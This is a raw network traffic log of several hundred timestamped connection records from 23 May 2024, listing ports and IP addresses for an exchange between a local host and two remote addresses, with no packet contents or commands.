May 23, 2024 15:34:11.277044058 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.277076006 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.277096033 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.277127028 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.277158022 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.277169943 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.277189016 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.277225971 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.278599024 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.278633118 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.278681993 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.280152082 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.280185938 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.280222893 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.280371904 CEST	443	61019	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.280447960 CEST	443	61019	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.280492067 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.281738043 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.281770945 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.281817913 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.283173084 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.283206940 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.283256054 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.284698009 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.284732103 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.284764051 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.284785986 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.286218882 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.286252022 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.286272049 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.287740946 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.287771940 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.287816048 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.289215088 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.289247036 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.289271116 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.290719986 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.290752888 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.290770054 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.292196035 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.292228937 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.292243004 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.292259932 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.292299032 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.293667078 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.293700933 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.293759108 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.295166016 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.295198917 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.295243979 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.296370983 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.296403885 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.296444893 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.297882080 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.297923088 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.297972918 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.298835993 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.298868895 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.298901081 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.298929930 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.300044060 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.300077915 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.300117016 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.301254988 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.301287889 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.301322937 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.301887989 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.302470922 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.302519083 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.302521944 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.303714991 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.303749084 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.303757906 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.303781033 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.303821087 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.304843903 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.304877043 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.304925919 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.306519032 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.306550980 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.306601048 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.307288885 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.307328939 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.307379007 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.308182955 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.308216095 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.308259964 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.309221983 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.309256077 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.309286118 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.309298038 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.310293913 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.310326099 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.310342073 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.311327934 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.311362982 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.311382055 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.312342882 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.312391996 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.312422991 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.315912962 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.315947056 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.315969944 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.315996885 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.316030025 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.316039085 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.316061020 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.316092968 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.316102982 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.316124916 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.316164970 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.316462040 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.316495895 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.316539049 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.317401886 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.317435026 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.317480087 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.318408012 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.318440914 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.318473101 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.318486929 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.319293976 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.319327116 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.319348097 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.320161104 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.320194006 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.320219994 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.321016073 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.321048021 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.321068048 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.321883917 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.321917057 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.321933985 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.321948051 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.321984053 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.322746038 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.322778940 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.322818995 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.323606968 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.323638916 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.323673964 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.324440956 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.324472904 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.324513912 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.325258017 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.325289965 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.325333118 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.326080084 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.326112032 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.326143026 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.326155901 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.326920986 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.326955080 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.326967001 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.327677011 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.327709913 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.327733040 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.328460932 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.328514099 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.331360102 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.331495047 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.331543922 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.331860065 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.332437992 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.332480907 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.332587957 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.333230019 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.333281040 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.333358049 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.333956957 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.334012032 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.334105015 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.334765911 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.334813118 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.334897041 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.335530043 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.335577965 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.335711956 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.336359978 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.336407900 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.337357998 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.337369919 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.337424040 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.337426901 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.338074923 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.338118076 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.338198900 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.338846922 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.338893890 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.339032888 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.339679003 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.339735985 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.339835882 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.340477943 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.340528965 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.340624094 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.341310978 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.341357946 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.342128038 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.342139959 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.342191935 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.342299938 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.342837095 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.342889071 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.342957020 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.343755960 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.343811989 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.343955040 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.344616890 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.344661951 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.344764948 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.345423937 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.345474958 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.345587015 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.346214056 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.346265078 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.347037077 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.347048044 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.347101927 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.347218037 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.347589016 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.347630024 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.347832918 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.348701954 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.348757029 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.348850965 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.349502087 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.349540949 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.349678040 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.350162983 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.350203991 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.350353003 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.350667953 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.350706100 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.351124048 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.351134062 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.351166964 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.351342916 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.352102041 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.352144003 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.352308035 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.352612972 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.352649927 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.352925062 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.353106976 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.353147984 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.353445053 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.354159117 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.354208946 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.354343891 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.354773998 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.354818106 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.355051041 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.355324030 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.355364084 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.355648994 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.356043100 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.356053114 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.356085062 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.356734991 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.356784105 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.356909990 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.357347012 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.357388020 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.358031988 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.358042955 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.358088970 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.358189106 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.358511925 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.358551025 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.358705044 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.358906031 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.358947992 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.359659910 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.359829903 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.359874964 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.360119104 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.360682964 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.360728979 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.360801935 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.361440897 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.361490011 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.362219095 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.362229109 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.362278938 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.362412930 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.363045931 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.363085032 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.363177061 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.363483906 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.363524914 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.363863945 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.364661932 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.364707947 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.364746094 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.365377903 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.365428925 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.365525007 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.366060019 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.366103888 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.366209984 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.366827011 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.366890907 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.367522001 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.367532015 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.367583990 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.367680073 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.368315935 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.368364096 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.368452072 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.368711948 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.368752956 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.368993044 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.369718075 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.369766951 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.369832993 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.370538950 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.370590925 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.370606899 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.371131897 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.371181011 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.371275902 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.371805906 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.371851921 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.372500896 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.372512102 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.372561932 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.372658968 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.373225927 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.373267889 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.373373032 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.373691082 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.373733044 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.374248028 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.374660969 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.374742985 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.374773026 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.375322104 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.375370026 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.375437975 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.375988960 CEST	4449	61010	66.235.168.242	192.168.2.5
